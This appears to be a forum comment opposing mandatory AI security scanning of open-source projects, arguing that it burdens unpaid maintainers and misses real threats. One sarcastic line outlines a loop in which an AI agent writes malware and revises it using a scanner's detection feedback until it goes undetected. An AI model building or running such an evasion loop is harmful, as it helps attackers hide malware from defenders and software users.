So first they steal all code and launder it without attribution. Then they release a tool that doesn't find anything in hardened projects and is marketed through secrecy and modern equivalents of Netcraft like this British AI institute.

Then open source projects need a McKinsey-like stamp of approval to even be released.

Sounds like there are many parasites in this process.

You know that open source users are free to scan everything if they want to?

> It'd stop the supply chain attacks too.

Yeah it’s hard to write a loop that makes an adversary agent write and mask malware then runs a scanning agent and if the malware is detected gives the detection details to the adversary agent with instructions to hide it better..

As usual, the attacker only needs to get lucky once.

> all open-source projects should be forced

That's a great way to kill OSS. This is only bootlicking the idea of corporations profiting off of unpaid labor.